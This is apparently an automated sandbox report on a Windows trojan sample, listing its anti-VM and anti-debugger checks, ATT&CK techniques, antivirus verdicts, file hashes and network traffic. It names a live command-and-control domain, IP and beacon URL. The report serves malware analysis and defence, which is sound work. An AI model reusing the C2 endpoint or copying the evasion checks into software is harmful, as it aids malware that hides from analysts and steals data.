Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 76E0079 second address: 76E009E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 76E009E second address: 76E00A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Special instruction interceptor: First address: 136BA8A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Special instruction interceptor: First address: 1515310 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Special instruction interceptor: First address: 136943E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Special instruction interceptor: First address: 159D98E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Code function: 0_2_00E09980 rdtsc 0_2_00E09980
Source: C:\Users\user\Desktop\HZhObFuFNe.exe TID: 7700 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Code function: 0_2_00C2255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00C2255D
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Code function: 0_2_00C229FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_00C229FF
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Code function: 0_2_00C2255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00C2255D
Source: HZhObFuFNe.exe, HZhObFuFNe.exe, 00000000.00000002.1497777692.00000000014F6000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: HZhObFuFNe.exe | Binary or memory string: Hyper-V RAW
Source: HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: HZhObFuFNe.exe, 00000000.00000003.1439286791.0000000006FD1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlS?
Source: HZhObFuFNe.exe, 00000000.00000002.1497777692.00000000014F6000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: HZhObFuFNe.exe, 00000000.00000002.1498770997.0000000001E19000.00000004.00000020.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000003.1485992230.0000000001E13000.00000004.00000020.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000003.1487061470.0000000001E18000.00000004.00000020.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000003.1485916905.0000000001E09000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: HZhObFuFNe.exe, 00000000.00000003.1436271671.0000000001DB2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlld
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | File opened: NTICE
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | File opened: SICE
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Code function: 0_2_00E09980 rdtsc 0_2_00E09980
Source: HZhObFuFNe.exe, HZhObFuFNe.exe, 00000000.00000002.1497777692.00000000014F6000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: DProgram Manager
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: HZhObFuFNe.exe, 00000000.00000003.1399095536.0000000007A36000.00000004.00001000.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: procmon.exe
Source: HZhObFuFNe.exe, 00000000.00000003.1399095536.0000000007A36000.00000004.00001000.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Source: Signature Results | Signatures: Mutex created, HTTP post and idle behavior
Source: global traffic | TCP traffic: 192.168.2.9:49708 -> 185.121.15.192:80
MITRE ATT&CK Matrix (techniques listed per tactic; a leading number is the hit count shown in the report for that technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 2 Command and Scripting Interpreter; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 1 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 24 Virtualization/Sandbox Evasion; 1 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 751 Security Software Discovery; 24 Virtualization/Sandbox Evasion; 13 Process Discovery; 1 Remote System Discovery; 1 File and Directory Discovery; 216 System Information Discovery
Lateral Movement: 1 Exploitation of Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 11 Archive Collected Data; 1 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 11 Encrypted Channel; 2 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

Antivirus detection for the submitted file

Source | Detection | Scanner | Label
HZhObFuFNe.exe | 64% | Virustotal |
HZhObFuFNe.exe | 58% | ReversingLabs | Win32.Trojan.Amadey
HZhObFuFNe.exe | 100% | Avira | TR/Crypt.TPM.Gen
HZhObFuFNe.exe | 100% | Joe Sandbox ML |

No Antivirus matches for dropped files, unpacked PE files, domains or URLs
Contacted domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
home.fivetk5ht.top | 185.121.15.192 | true | false | | high
httpbin.org | 98.85.100.80 | true | false | | high
Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851 | false | | high
https://httpbin.org/ip | false | | high
URLs from memory and binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://curl.se/docs/hsts.html | HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://html4/loose.dtd | HZhObFuFNe.exe, 00000000.00000003.1399095536.0000000007A36000.00000004.00001000.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmp | false | | high
https://curl.se/docs/alt-svc.html# | HZhObFuFNe.exe | false | | high
http://home.fivetk5ht.top/zldPR | HZhObFuFNe.exe, 00000000.00000003.1486137662.0000000001E01000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851http://home.fivetk5ht.top/zldPRFrmVFHTtKntGp | HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmp | false | | unknown
https://httpbin.org/ipbefore | HZhObFuFNe.exe, 00000000.00000003.1399095536.0000000007A36000.00000004.00001000.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmp | false | | high
https://curl.se/docs/http-cookies.html | HZhObFuFNe.exe, HZhObFuFNe.exe, 00000000.00000003.1399095536.0000000007A36000.00000004.00001000.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv173457985135a1 | HZhObFuFNe.exe, 00000000.00000003.1487211287.0000000001DA8000.00000004.00000020.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000003.1487134629.0000000001DA3000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://curl.se/docs/hsts.html# | HZhObFuFNe.exe | false | | high
http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17345798516963 | HZhObFuFNe.exe, 00000000.00000003.1487211287.0000000001DA8000.00000004.00000020.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000003.1487578348.0000000001DAA000.00000004.00000020.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000003.1487134629.0000000001DA3000.00000004.00000020.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000002.1498497294.0000000001DAA000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17 | HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmp | false | | high
https://curl.se/docs/alt-svc.html | HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://.css | HZhObFuFNe.exe, 00000000.00000003.1399095536.0000000007A36000.00000004.00001000.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://.jpg | HZhObFuFNe.exe, 00000000.00000003.1399095536.0000000007A36000.00000004.00001000.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmp | false | | high
Contacted IPs

IP | Domain | Country | ASN | ASN Name | Malicious
185.121.15.192 | home.fivetk5ht.top | Spain | 207046 | REDSERVICIOES | false
98.85.100.80 | httpbin.org | United States | 11351 | TWC-11351-NORTHEASTUS | false
General Information

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1578913
Start date and time: 2024-12-20 16:34:25 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 49s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: HZhObFuFNe.exe (renamed because the original name is a hash value)
Original Sample Name: 2ba7ee5357b8762915d320630e9a59b7.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@6/2
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 4.245.163.56
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
10:35:28 | API Interceptor | 3x Sleep call for process: HZhObFuFNe.exe modified
Other samples seen contacting the same IPs (the SHA 256 and report link columns were hyperlinks and are omitted)

Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.121.15.192 | t6VDbnvGeN.exe | malicious | Unknown | home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
185.121.15.192 | 16ebsersuX.exe | malicious | Cryptbot | home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
185.121.15.192 | hUhhrsyGtz.exe | malicious | Cryptbot | home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
185.121.15.192 | pCElIX19tu.exe | malicious | Unknown | home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
185.121.15.192 | CMpuGis28l.exe | malicious | Unknown | home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
185.121.15.192 | 5Jat5RkD3a.exe | malicious | Unknown | home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
185.121.15.192 | u57m8aCdwb.exe | malicious | Unknown | home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
185.121.15.192 | TnIhoWAr57.exe | malicious | Clipboard Hijacker, Cryptbot | home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
185.121.15.192 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT | home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851?argument=TmUWwkAQBKXXTWTE1734696758
98.85.100.80 | t6VDbnvGeN.exe | malicious | Unknown |
98.85.100.80 | CMpuGis28l.exe | malicious | Unknown |
98.85.100.80 | u57m8aCdwb.exe | malicious | Unknown |
98.85.100.80 | TnIhoWAr57.exe | malicious | Clipboard Hijacker, Cryptbot |
98.85.100.80 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT |
98.85.100.80 | file.exe | malicious | LummaC, Amadey, LummaC Stealer |
98.85.100.80 | file.exe | malicious | ScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar |
98.85.100.80 | Tii6ue74NB.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, Vidar |
98.85.100.80 | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS |
98.85.100.80 | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Xmrig |
Other samples seen contacting the same domains

Match | Associated Sample Name / URL | Detection | Threat Name | Context
home.fivetk5ht.top | t6VDbnvGeN.exe | malicious | Unknown | 185.121.15.192
home.fivetk5ht.top | hUhhrsyGtz.exe | malicious | Cryptbot | 185.121.15.192
home.fivetk5ht.top | pCElIX19tu.exe | malicious | Unknown | 185.121.15.192
home.fivetk5ht.top | CMpuGis28l.exe | malicious | Unknown | 185.121.15.192
home.fivetk5ht.top | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT | 185.121.15.192
home.fivetk5ht.top | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT | 185.121.15.192
httpbin.org | t6VDbnvGeN.exe | malicious | Unknown | 98.85.100.80
httpbin.org | 16ebsersuX.exe | malicious | Cryptbot | 34.226.108.155
httpbin.org | hUhhrsyGtz.exe | malicious | Cryptbot | 34.226.108.155
httpbin.org | pCElIX19tu.exe | malicious | Unknown | 34.226.108.155
httpbin.org | CMpuGis28l.exe | malicious | Unknown | 98.85.100.80
httpbin.org | 5Jat5RkD3a.exe | malicious | Unknown | 34.226.108.155
httpbin.org | u57m8aCdwb.exe | malicious | Unknown | 98.85.100.80
httpbin.org | TnIhoWAr57.exe | malicious | Clipboard Hijacker, Cryptbot | 98.85.100.80
httpbin.org | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT | 34.226.108.155
httpbin.org | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT | 98.85.100.80
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          TWC-11351-NORTHEASTUSt6VDbnvGeN.exeGet hashmaliciousUnknownBrowse
                                                          • 98.85.100.80
                                                          CMpuGis28l.exeGet hashmaliciousUnknownBrowse
                                                          • 98.85.100.80
                                                          u57m8aCdwb.exeGet hashmaliciousUnknownBrowse
                                                          • 98.85.100.80
                                                          TnIhoWAr57.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                          • 98.85.100.80
                                                          arm5.elfGet hashmaliciousMiraiBrowse
                                                          • 72.226.210.219
                                                          hmips.elfGet hashmaliciousMiraiBrowse
                                                          • 45.46.119.24
                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                          • 98.85.100.80
                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                          • 98.85.100.80
                                                          la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                                                          • 67.252.15.48
                                                          la.bot.sparc.elfGet hashmaliciousMiraiBrowse
                                                          • 98.94.131.188
                                                          REDSERVICIOESt6VDbnvGeN.exeGet hashmaliciousUnknownBrowse
                                                          • 185.121.15.192
                                                          16ebsersuX.exeGet hashmaliciousCryptbotBrowse
                                                          • 185.121.15.192
                                                          hUhhrsyGtz.exeGet hashmaliciousCryptbotBrowse
                                                          • 185.121.15.192
                                                          pCElIX19tu.exeGet hashmaliciousUnknownBrowse
                                                          • 185.121.15.192
                                                          CMpuGis28l.exeGet hashmaliciousUnknownBrowse
                                                          • 185.121.15.192
                                                          5Jat5RkD3a.exeGet hashmaliciousUnknownBrowse
                                                          • 185.121.15.192
                                                          u57m8aCdwb.exeGet hashmaliciousUnknownBrowse
                                                          • 185.121.15.192
                                                          TnIhoWAr57.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                          • 185.121.15.192
                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                          • 185.121.15.192
                                                          http://blacksaltys.comGet hashmaliciousUnknownBrowse
                                                          • 185.121.15.137
                                                          No context
                                                          No created / dropped files found
File type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit): 7.985235252687234
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• VXD Driver (31/22) 0.00%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: HZhObFuFNe.exe
File size: 4'470'784 bytes
MD5: 2ba7ee5357b8762915d320630e9a59b7
SHA1: f4995defaafe3b084242e2b9f382c7b379938420
SHA256: 9249b72e3a0443ec9df0569d0a3fbe76c52d21c1b5d69f9dfb41d40b819e3181
SHA512: 6bd830e6c4aa7fce70f7dd0ca2ea5f99ae5bda4374a318a9595285e57f81ffa92a19f0e9e6c4b025252b4a54afae10a18c3182a006827791e79af98485d1c4b8
SSDEEP: 98304:kWVlpHm8qq3fN2NV+5dcPUx55rJb7z2rdsdfFF9Fb4U5u9c:kWVrXpV2/EWUp1/qyBF
TLSH: 8E2633FBA6EC7FC8E106DE365EE14FB978820251C6367744AC71B31484471E949EA8E3
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....cg...............(.VH...v..2...........pH...@..........................@........D...@... ............................
Icon Hash: 00928e8e8686b000
Entrypoint: 0x1091000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics: DYNAMIC_BASE
Time Stamp: 0x67639809 [Thu Dec 19 03:50:33 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
                                                          Instruction
                                                          jmp 00007F6FA519776Ah
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x74705f | 0x73 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x746000 | 0x1ac | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc8fe04 | 0x10 | vdxoyfiw
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc8fdb4 | 0x18 | vdxoyfiw
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(no name) | 0x1000 | 0x745000 | 0x284c00 | e6602c426e8fa115cf1a08eab66f62b2 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x746000 | 0x1ac | 0x200 | 45f79e76e15c8f28edefe53c69c2c682 | False | 0.578125 | data | 4.559253888749826 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x747000 | 0x1000 | 0x200 | e84636d45557e74dadd0f14f36394655 | False | 0.166015625 | data | 1.1471680400846989 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(no name) | 0x748000 | 0x38d000 | 0x200 | 50dff9698d96422a18b4f11e5deb5ac9 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
vdxoyfiw | 0xad5000 | 0x1bb000 | 0x1bb000 | 927629084bdd7d42ae516e57ad856a60 | False | 0.9943814589799661 | data | 7.95517720558757 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
lxmogbqr | 0xc90000 | 0x1000 | 0x400 | 29398317e488515543f59d66db7e8fe6 | False | 0.716796875 | data | 5.8208275696326846 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0xc91000 | 0x3000 | 0x2200 | cda67ac8775dc0bbbf95f68c86a5151b | False | 0.06560202205882353 | DOS executable (COM) | 0.7501659348063598 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0xc8fe14 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402
DLL | Import
kernel32.dll | lstrcpy
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                          Dec 20, 2024 16:35:28.984117031 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.984497070 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.984528065 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.984577894 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.984761000 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:28.989696980 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:29.103458881 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.103527069 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:29.103795052 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.103842974 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:29.103913069 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.103955030 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:29.104110003 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.104156971 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:29.104187965 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.104244947 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.104254961 CET8049708185.121.15.192192.168.2.9
